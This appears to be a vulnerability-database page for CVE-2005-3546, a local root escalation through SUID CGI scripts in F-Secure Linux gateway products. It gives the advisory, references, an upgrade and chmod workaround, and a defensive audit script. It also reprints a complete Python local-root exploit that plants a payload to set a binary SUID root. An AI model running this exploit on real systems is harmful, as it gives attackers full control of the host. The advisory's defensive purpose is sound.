CVE-2005-3546
CVSS 7.2
Published: 2005-11-16 02:42:00
Last revised: 2011-03-07 21:26:45

[Original] suid.cgi scripts in F-Secure (1) Internet Gatekeeper for Linux before 2.15.484 and (2) Anti-Virus Linux Gateway before 2.16 are installed SUID with world-executable permissions, which allows local users to gain privilege.


[CNNVD] F-Secure Anti-Virus Gatekeeper for Linux and F-Secure Anti-Virus Gateway for Linux local privilege escalation vulnerability (CNNVD-200511-172)

        F-Secure Internet Gatekeeper for Linux and Anti-Virus Linux Gateway are both anti-virus products.
        The suid.cgi scripts in F-Secure (1) Internet Gatekeeper for Linux before 2.15.484 and (2) Anti-Virus Linux Gateway before 2.16 are installed SUID with execute permission for all users, which allows local users to gain privileges.

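- CVSS (base score)

CVSS score: 7.2 [Severe (HIGH)]
Confidentiality impact: COMPLETE [total information disclosure, exposing all system files]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may cause the system to go down completely]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]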

- CPE (affected platforms and products)

cpe:/a:f-secure:internet_gatekeeper:::linux
cpe:/a:f-secure:f-secure_anti-virus:::linux_gateways

- OVAL (technical details for detection)

No related OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3546
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3546
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200511-172
(official data source) CNNVD

- Other links and resources

http://www.f-secure.com/security/fsc-2005-3.shtml
(VENDOR_ADVISORY)  CONFIRM  http://www.f-secure.com/security/fsc-2005-3.shtml
http://secunia.com/advisories/17467
(VENDOR_ADVISORY)  SECUNIA  17467
http://www.vupen.com/english/advisories/2005/2331
(UNKNOWN)  VUPEN  ADV-2005-2331
http://xforce.iss.net/xforce/xfdb/22966
(UNKNOWN)  XF  fsecure-scripts-root-privileges(22966)
http://www.securityfocus.com/bid/15339
(UNKNOWN)  BID  15339
http://www.osvdb.org/20552
(UNKNOWN)  OSVDB  20552
http://www.osvdb.org/20551
(UNKNOWN)  OSVDB  20551
http://www.osvdb.org/20550
(UNKNOWN)  OSVDB  20550
http://www.osvdb.org/20549
(UNKNOWN)  OSVDB  20549
http://www.osvdb.org/20548
(UNKNOWN)  OSVDB  20548
http://www.osvdb.org/20547
(UNKNOWN)  OSVDB  20547
http://www.osvdb.org/20546
(UNKNOWN)  OSVDB  20546
http://www.osvdb.org/20545
(UNKNOWN)  OSVDB  20545
http://www.osvdb.org/20544
(UNKNOWN)  OSVDB  20544
http://www.osvdb.org/20543
(UNKNOWN)  OSVDB  20543
http://www.osvdb.org/20542
(UNKNOWN)  OSVDB  20542
http://www.osvdb.org/20541
(UNKNOWN)  OSVDB  20541
http://www.osvdb.org/20540
(UNKNOWN)  OSVDB  20540
http://www.osvdb.org/20539
(UNKNOWN)  OSVDB  20539
http://www.osvdb.org/20538
(UNKNOWN)  OSVDB  20538
http://www.osvdb.org/20537
(UNKNOWN)  OSVDB  20537
http://www.osvdb.org/20513
(UNKNOWN)  OSVDB  20513
http://securitytracker.com/id?1015160
(UNKNOWN)  SECTRACK  1015160
http://securitytracker.com/id?1015159
(UNKNOWN)  SECTRACK  1015159

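- Vulnerability information

F-Secure Anti-Virus Gatekeeper for Linux and F-Secure Anti-Virus Gateway for Linux local privilege escalation vulnerability
High risk  Design error
2005-11-16 00:00:00 2005-11-16 00:00:00
Local
        F-Secure Internet Gatekeeper for Linux and Anti-Virus Linux Gateway are both anti-virus products.
        The suid.cgi scripts in F-Secure (1) Internet Gatekeeper for Linux before 2.15.484 and (2) Anti-Virus Linux Gateway before 2.16 are installed SUID with execute permission for all users, which allows local users to gain privileges.

- Advisories and patches

        No data available

- Vulnerability information (1297)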

F-Secure Internet Gatekeeper for linux < 2.15.484 Local Root Exploit (EDBID:1297)
linux local
2005-11-07 Verified
0 Xavier de Leon
N/A
#!/usr/bin/env python
#
# F-Secure Anti-Virus Internet Gatekeeper for Linux <2.15.484 
# F-Secure Anti-Virus Linux Gateway <2.16 # added line 3-4 for references /str0ke
#
##############################################################################
##  fsigk_exp.py: F-Secure Internet Gatekeeper for Linux local root exploit
##  acknowledgements: everyone in pure-elite and uDc.
##
##  coded by: xavier@tigerteam.se [http://xavsec.blogspot.com]
##############################################################################

##############################################################################
##  Make proper checks and import nessesary calls from modules.
##

try: 
    from sys import argv
except Exception: 
    print "the 'sys' module could not be loaded"
    raise SystemExit

try: 
    from os import unlink, stat, error, symlink, system, chmod
except Exception:
     print "the 'os' module could not be loaded"
     raise SystemExit

try: 
    import getopt
except Exception: 
    print "the 'getopt' module could not be loaded"
    raise SystemExit

##############################################################################
##  Constants.
##

__program__ = argv[0]
__version__ = "0.1beta"
__author__ = "<xavier@tigerteam.se>"
__lastedit__ = "Thu Sep 22 23:18:39 EDT 2005"
__usage__ = """usage: %s [-options]

options:
       --version  show program's version number and exit.
      -h, --help  show this help message and exit.

      -s, --suid  file location to suid.
       -d, --dir  cgi directory.
     -c, --clean  cleans any left over files from the environment creation.
              -#  enter numerical value of vulnerable file to exploit. [list below]

 1: ifconfig_suid.cgi  |  2: reboot_suid.cgi     |  3: proxy_suid.cgi
 4: edittmpl_suid.cgi  |  5: version_suid.cgi    |  6: hostname_suid.cgi
 7: gateway_suid.cgi   |  8: halt_suid.cgi       |  9: edituserdb_suid.cgi
10: htpasswd_suid.cgi  | 11: pattern_up_suid.cgi | 12: license_suid.cgi
13: iptables_suid.cgi  | 14: dns_suid.cgi        | 15: pattern_autoup_suid.cgi
16: spam_list_suid.cgi | 17: diag_suid.cgi""" % (__program__)

#######################################################################################
## Functions.
##

def _write(file, payload):
    try: 
        open(file, 'w').write(payload)
        chmod(file, 0100)
    except Exception, err: 
        print ("[-] %s" % (err))

def _exists(path):
    try: 
        stat(path)
    except error:
        return False
    return True

def _handleopts():
    for opt in argv[1:]:
        if opt in ("-h", "--help"): 
            print "%s" % (__usage__),
            raise SystemExit
        if opt in ("-v", "--version"): 
            print "%s (%s)" % (__version__, __lastedit__),
            raise SystemExit

    _method_ = 'ifconfig_suid.cgi'
    _file_ = 'ifconfig.cgi'
    for opt in argv[1:]:
        if opt == "-1": 
            _method_ = 'ifconfig_suid.cgi'
        elif opt == "-2": 
            _method_ = 'reboot_suid.cgi'
            _file_ = 'reboot.cgi'
        elif opt == "-3": 
            _method_ = 'proxy_suid.cgi'
            _file_ = 'proxy.cgi'
        elif opt == "-4": 
            _method_ = 'edittmpl_suid.cgi'
            _file_ = 'edittmpl.cgi'
        elif opt == "-5": 
            _method_ = 'version_suid.cgi'
            _file_ = 'version.cgi'
        elif opt == "-6": 
            _method_ = 'hostname_suid.cgi'
            _file_ = 'hostname.cgi'
        elif opt == "-7": 
            _method_ = 'gateway_suid.cgi'
            _file_ = 'gateway.cgi'
        elif opt == "-8": 
            _method_ = 'halt_suid.cgi'
            _file_ = 'halt.cgi'
        elif opt == "-9": 
            _method_ = 'edituserdb_suid.cgi'
            _file_ = 'edituserdb.cgi'
        elif opt == "-10": 
            _method_ = 'htpasswd_suid.cgi'
            _file_ = 'htpasswd.cgi'
        elif opt == "-11": 
            _method_ = 'pattern_up_suid.cgi'
            _file_ = 'pattern_up.cgi'
        elif opt == "-12": 
            _method_ = 'license_suid.cgi'
            _file_ = 'license.cgi'
        elif opt == "-13":
            _method_ = 'iptables_suid.cgi'
            _file_ = 'iptables.cgi'
        elif opt == "-14": 
            _method_ = 'dns_suid.cgi'
            _file_ = 'dns.cgi'
        elif opt == "-15": 
            _method_ = 'pattern_autoup_suid.cgi'
            _file_ = 'pattern_autoup.cgi'
        elif opt == "-16": 
            _method_ = 'spam_list_suid.cgi'
            _file_ = 'spam_list.cgi'
        elif opt == "-17": 
            _method_ = 'diag_suid.cgi'
            _file_ = 'diag.cgi'
        else: 
            pass

    try:
        opts = getopt.getopt(argv[1:], 'c1234567890s:d:', ['clean', \
                                                          'suid=', \
                                                          'dir='])[0]
    except Exception, (err):
        print "[-] %s" % (err),
        raise SystemExit

    _dir_ = None
    _payload_ = None
    _combine_ = None

    for o, a in opts:
        if o in ("-c", "--clean"): 
            _clean()
            print "[*] done"
            raise SystemExit
        if o in ("-d", "--dir"): 
            if _exists(a): 
                _dir_ = a
            else: 
                print "[-] unable to access the %s directory" % (_dir_),
                raise SystemExit
        if o in ("-s", "--suid"): 
            if _exists(a): 
                _payload_ = _suid(a)
            else: 
                print "[-] unable to access binary."
                raise SystemExit

    if _dir_ == None: 
        print "[-] no directory was given [try -h for help menu]"
        raise SystemExit
    if _payload_ == None: 
        print "[-] enter binary to suid [try -h for help menu]"
        raise SystemExit
    _combined_ = "%s/%s" % (_dir_, _method_)
    if not _exists(_combined_): 
        print "[-] method not possible, try another."
        raise SystemExit

    print "[*] creating environment..."
    try:
        symlink('%s/%s' % (_dir_, _method_), 'runbad')
        _write(_file_, _payload_)
    except Exception, err:
        raise SystemExit


def _suid(file):
    _suid_ = """#!/bin/sh
chown 0.0 %(file)s
chmod 4755 %(file)s
""" % (locals())
    return _suid_


def _clean():
    try:
        files = ['runbad', 'ifconfig.cgi', 'reboot.cgi', 'proxy.cgi', 
                 'edittmpl.cgi', 'version.cgi', 'hostname.cgi', 'gateway.cgi',
                 'halt.cgi', 'edituserdb.cgi', 'htpasswd.cgi', 'pattern_up.cgi',
                 'license.cgi', 'iptables.cgi', 'dns.cgi', 'pattern_autoup.cgi', 
                 'spam_list.cgi', 'diag_suid.cgi']

        for file in files:
            if _exists(file): unlink(file)

    except Exception, err:
        print "[-] %s" % (err),


##############################################################################
##  main() // main code.
##

def main():
    try:
        print "[INFO] F-Secure Internet Gatekeeper for Linux <=2.10-431 local exploit by %s" % (__author__)
        print "[*] handling options, arguments..."
        _handleopts()
        print "[*] executing exploit..."
        system('./runbad')
        print "[*] cleaning..."
        _clean()
        print "[*] done... try executing the specified binary."
    except KeyboardInterrupt:
        print "[-] caught keyboard interuption"
        raise SystemExit
    except Exception, (err): 
        _clean()
        raise SystemExit

if __name__ == '__main__': main()

# milw0rm.com [2005-11-07]
		

- Vulnerability information

20513
F-Secure Anti-Virus Internet Gatekeeper/Linux Gateway ifconfig_suid.cgi Local Privilege Escalation
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

F-Secure Anti-Virus Internet Gatekeeper for Linux and F-Secure Anti-Virus Linux Gateway contain a flaw that may allow a malicious local user to elevate privileges to root. The issue is triggered when a user creates a malicious script named ifconfig.cgi in the current working directory, and executes the SUID script ifconfig_suid.cgi using its full path. The SUID script will execute the malicious script because it looks for it in the working directory. This flaw may lead to a loss of integrity.

- Timeline

2005-11-07 2005-09-29
Unknown Unknown

- Solution

Upgrade F-Secure Anti-Virus Internet Gatekeeper for Linux to version 2.15.484 or higher. Upgrade F-Secure Anti-Virus Linux Gateway to version 2.16 or higher, as these updates have been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround: For F-Secure Internet Gatekeeper for Linux: "chmod -s /opt/f-secure/fsigk/cgi/*suid.cgi" For F-Secure Anti-Virus Linux Gateway: "chmod -s /home/virusgw/cgi/*suid.cgi"
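
The check below is an added example, not part of the original record or of F-Secure's tooling: it audits a CGI directory for `*suid.cgi` files that carry a set-ID bit and are world-executable (the condition this record describes), then applies the equivalent of the `chmod -s` workaround. The function names and the constructed temporary-directory sandbox are assumptions; the two directory paths are the ones quoted in the workaround above.

```python
import os
import stat
import tempfile
from glob import glob

# Install paths quoted in the workaround on this page.
CGI_DIRS = ["/opt/f-secure/fsigk/cgi", "/home/virusgw/cgi"]
SET_ID = stat.S_ISUID | stat.S_ISGID


def audit_suid_cgi(cgi_dir):
    """List *suid.cgi regular files that are set-ID and world-executable."""
    findings = []
    for path in sorted(glob(os.path.join(cgi_dir, "*suid.cgi"))):
        st = os.lstat(path)
        if not stat.S_ISREG(st.st_mode):
            continue  # ignore symlinks and directories
        if st.st_mode & SET_ID and st.st_mode & stat.S_IXOTH:
            findings.append((path, oct(stat.S_IMODE(st.st_mode)), st.st_uid))
    return findings


def strip_set_id(path):
    """Same effect as `chmod -s`: clear setuid/setgid, keep the other bits."""
    mode = stat.S_IMODE(os.lstat(path).st_mode)
    os.chmod(path, mode & ~SET_ID)


def demo():
    """Constructed sandbox: returns flagged names before and after the fix."""
    with tempfile.TemporaryDirectory() as d:
        samples = [("ifconfig_suid.cgi", 0o4755),  # set-ID + world-exec: flagged
                   ("reboot_suid.cgi", 0o4750),    # set-ID, not world-exec
                   ("version_suid.cgi", 0o0755)]   # already remediated
        for name, mode in samples:
            path = os.path.join(d, name)
            open(path, "w").close()
            os.chmod(path, mode)
        before = [os.path.basename(p) for p, _, _ in audit_suid_cgi(d)]
        for p, _, _ in audit_suid_cgi(d):
            strip_set_id(p)
        return before, audit_suid_cgi(d)


if __name__ == "__main__":
    print("sandbox:", demo())
    for cgi_dir in CGI_DIRS:
        for path, mode, uid in audit_suid_cgi(cgi_dir):
            print("FINDING %s mode=%s owner_uid=%d" % (path, mode, uid))
```

Run as a script on a gateway host, it reports any remaining findings in the two install directories; an empty result after upgrading or applying the workaround is the expected state.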

- Related references

- Vulnerability author

- Vulnerability information

F-Secure Anti-Virus Gatekeeper and Gateway for Linux Local Privilege Escalation Vulnerability
Design Error 15339
No Yes
2005-11-07 12:00:00 2007-02-20 09:26:00
Tigerteam.se Security reported this issue to the vendor.

- Affected versions

F-Secure Internet Gatekeeper for Linux
F-Secure Anti-Virus for Linux Gateways
F-Secure Internet Gatekeeper for Linux 2.15.484
F-Secure Anti-Virus for Linux Gateways 2.16

- Unaffected versions

F-Secure Internet Gatekeeper for Linux 2.15.484
F-Secure Anti-Virus for Linux Gateways 2.16

- Vulnerability discussion

F-Secure Anti-Virus products are prone to a local privilege-escalation vulnerability because of insecure setuid-superuser binary permissions.

Exploiting this vulnerability allows local attackers to gain superuser privileges, leading to a complete compromise of the affected computer.

- Exploit

An exploit is not required.

The following proof of concept (fsigk_exp.py) has been provided by <xavier@tigerteam.se>.

- Solution

The vendor has released an advisory along with fixes to address this issue. Please see the referenced advisory for information on obtaining fixes.

- Related references
